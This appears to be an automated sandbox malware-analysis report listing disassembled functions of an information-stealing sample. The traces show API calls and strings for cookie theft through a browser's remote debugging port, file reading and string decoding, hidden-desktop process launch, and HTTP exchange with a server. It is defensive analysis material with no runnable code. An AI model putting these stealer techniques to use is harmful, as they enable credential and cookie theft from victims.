API String ID: 2775534915-0
Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A

Function 048CD257 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CD2EA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 048CD42E
RtlAllocateHeap.NTDLL(00000000), ref: 048CD435
lstrcat.KERNEL32(?,00000000), ref: 048CD56F
lstrcat.KERNEL32(?,00421570), ref: 048CD57E
lstrcat.KERNEL32(?,00000000), ref: 048CD591
lstrcat.KERNEL32(?,00421574), ref: 048CD5A0
lstrcat.KERNEL32(?,00000000), ref: 048CD5B3
lstrcat.KERNEL32(?,00421578), ref: 048CD5C2
lstrcat.KERNEL32(?,00000000), ref: 048CD5D5
lstrcat.KERNEL32(?,0042157C), ref: 048CD5E4
lstrcat.KERNEL32(?,00000000), ref: 048CD5F7
lstrcat.KERNEL32(?,00421580), ref: 048CD606
lstrcat.KERNEL32(?,00000000), ref: 048CD619
lstrcat.KERNEL32(?,00421584), ref: 048CD628
lstrcat.KERNEL32(?,00000000), ref: 048CD63B
lstrcat.KERNEL32(?,00421588), ref: 048CD64A

Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC

lstrlen.KERNEL32(?), ref: 048CD691
lstrlen.KERNEL32(?), ref: 048CD6A0
memset.MSVCRT ref: 048CD6EF

Part of subcall function 048DAFE7: StrCmpCA.SHLWAPI(00000000,00421568,048CD509,00421568,00000000), ref: 048DB006

DeleteFileA.KERNEL32(00000000), ref: 048CD71B

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
Instruction ID: 9ee9728ef34ebd58c339b9d49f10a5b8c876463a3de952531262250b6c1caf33
Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
Instruction Fuzzy Hash: 49E14E71D01118ABDB08EBA4DD54DEE7339AF54305F204A69F507E60A0EFB5BE48CB62

Function 00409BE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 141stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A

memset.MSVCRT ref: 00409C33
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
memset.MSVCRT ref: 00409C9A
lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
lstrcatA.KERNEL32(?,?), ref: 00409CD5
lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
lstrcatA.KERNEL32(?,?), ref: 00409CFB
lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
lstrlenA.KERNEL32(00000000), ref: 00409D17
lstrlenA.KERNEL32(00000000), ref: 00409D26

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memset.MSVCRT ref: 00409D7E

Strings

.txt, xrefs: 00409D01
/devtools, xrefs: 00409C0B
cookies, xrefs: 00409CA3
localhost, xrefs: 00409BF5
ws://localhost:9229, xrefs: 00409C3C

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 689835475-3542011879
Opcode ID: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
Instruction ID: 9597081ec4872356d8a1e20e182716cfae729ad967be985c4dfb38bd464ab4a8
Opcode Fuzzy Hash: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
Instruction Fuzzy Hash: 74516D71D10518ABCB14EBA0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69

Function 048C5C17 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 048C5CAF
StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C5CCA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C5E4A
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 048C6128
lstrlen.KERNEL32(00000000), ref: 048C6139
GetProcessHeap.KERNEL32(00000000,?), ref: 048C614A
RtlAllocateHeap.NTDLL(00000000), ref: 048C6151
lstrlen.KERNEL32(00000000), ref: 048C6166
memcpy.MSVCRT(?,00000000,00000000), ref: 048C617D
lstrlen.KERNEL32(00000000), ref: 048C618F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048C61A8
memcpy.MSVCRT(?), ref: 048C61B5
lstrlen.KERNEL32(00000000,?,?), ref: 048C61D2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048C61E6
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 048C6203
InternetCloseHandle.WININET(00000000), ref: 048C6267
InternetCloseHandle.WININET(00000000), ref: 048C6274
HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C5EAF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

InternetCloseHandle.WININET(00000000), ref: 048C627E

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID:
API String ID: 1703137719-0
Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
Instruction ID: 83685a4dd78fcfbb7099282a6059158d70d5bdab14e190e2bda898d64d650807
Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
Instruction Fuzzy Hash: 9712ED71D51128AADB19EBA4DC94FEEB378BF14705F504AA9A107E2090EFB07A48CF51

Function 0040CA90 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02EB5330,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
StrStrA.SHLWAPI(?,02EB54E0,00420B56), ref: 0040CBF7
StrStrA.SHLWAPI(00000000,02EB53A8), ref: 0040CC1E
StrStrA.SHLWAPI(?,02EB5DF0,00000000,?,00421550,00000000,?,00000000,00000000,?,02EB2210,00000000,?,0042154C,00000000,?), ref: 0040CDA2
StrStrA.SHLWAPI(00000000,02EB5C30), ref: 0040CDB9

Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB20E0), ref: 0040C971
Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12

StrStrA.SHLWAPI(?,02EB5C30,00000000,?,00421554,00000000,?,00000000,02EB20E0), ref: 0040CE5A
StrStrA.SHLWAPI(00000000,02EB2420), ref: 0040CE71

Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

lstrlenA.KERNEL32(00000000), ref: 0040CF44
CloseHandle.KERNEL32(00000000), ref: 0040CF9C

Strings

, xrefs: 0040CAC6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 1564132460-3916222277
Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69

Function 048CCCF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 048CCDD3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 048CCDF0
GetFileSize.KERNEL32(00000000,00000000), ref: 048CCDFC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 048CCE0F
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 048CCE1C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 048CCE40
StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 048CCE5E
StrStrA.SHLWAPI(00000000,006D6D64), ref: 048CCE85
StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 048CD009
StrStrA.SHLWAPI(00000000,006D6ECC), ref: 048CD020

Part of subcall function 048CCB87: memset.MSVCRT ref: 048CCBBA
Part of subcall function 048CCB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 048CCBD8
Part of subcall function 048CCB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 048CCBE3
Part of subcall function 048CCB87: memcpy.MSVCRT(?,?,?), ref: 048CCC79

StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 048CD0C1
StrStrA.SHLWAPI(00000000,006D6FA8), ref: 048CD0D8

Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B47), ref: 048CCCAA
Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B4B), ref: 048CCCBE
Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B4E), ref: 048CCCDF

lstrlen.KERNEL32(00000000), ref: 048CD1AB
CloseHandle.KERNEL32(00000000), ref: 048CD203

Strings

, xrefs: 048CCD2D

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 1564132460-3916222277
Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
Instruction ID: 049f3df92b5b6044e418b9bfbcea62f46f199acd9af5276afe039ef1ddac632c
Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
Instruction Fuzzy Hash: A7E1FB71D01118ABDB18EBA8DC90EEEB779AF58304F504A59F147E2190EFB07A49CF61

Function 048CA097 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048CA0AE

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

wsprintfA.USER32 ref: 048CA0E6
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 048CA10A
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 048CA133
memset.MSVCRT ref: 048CA154
lstrcat.KERNEL32(00000000,?), ref: 048CA16A
lstrcat.KERNEL32(00000000,?), ref: 048CA17E
lstrcat.KERNEL32(00000000,004212D8), ref: 048CA190
memset.MSVCRT ref: 048CA1A4
lstrcpy.KERNEL32(?,00000000), ref: 048CA1E3
memset.MSVCRT ref: 048CA203
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 048CA26B
Sleep.KERNEL32(00001388), ref: 048CA27A
CloseDesktop.USER32(00000000), ref: 048CA2C7

Strings

D, xrefs: 048CA20B

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
Instruction ID: 6c354bae4d093feea8d70f11ca7176926f957faca3ded8d8b88b4c420048ea17
Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
Instruction Fuzzy Hash: BA5193B1D04318ABEB24DB64DC49FD97778AF48704F004698F60DAA2D0EBB5AB84CF55

Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC

Strings

`dAF, xrefs: 004191CF, 00419399, 004191D2, 0041939C
`dAF, xrefs: 00419361, 004193D9, 0041930E, 004192DF, 004192B2, 0041920D, 004191E4, 00419364
image/jpeg, xrefs: 004192C6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `dAF$`dAF$image/jpeg
API String ID: 2244384528-2462684518
Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00411A15
ExitProcess.KERNEL32 ref: 00411A21
strtok_s.MSVCRT ref: 00411A38

Strings

block, xrefs: 00411A07

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
lstrlenA.KERNEL32(00000000), ref: 0041557F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
lstrlenA.KERNEL32(00000000), ref: 004155D3
strtok.MSVCRT(00000000,?), ref: 004155EE
lstrlenA.KERNEL32(00000000), ref: 004155FE

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

ERROR, xrefs: 00415682
ERROR, xrefs: 004156F9
ERROR, xrefs: 00415609
ERROR, xrefs: 0041555A
lXA, xrefs: 0041570E, 004156D4, 00415697, 0041565A, 0041561E
ERROR, xrefs: 004156BF

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
API String ID: 3532888709-2643084821
Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A

Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411557
strtok_s.MSVCRT ref: 004119A0

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95

Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

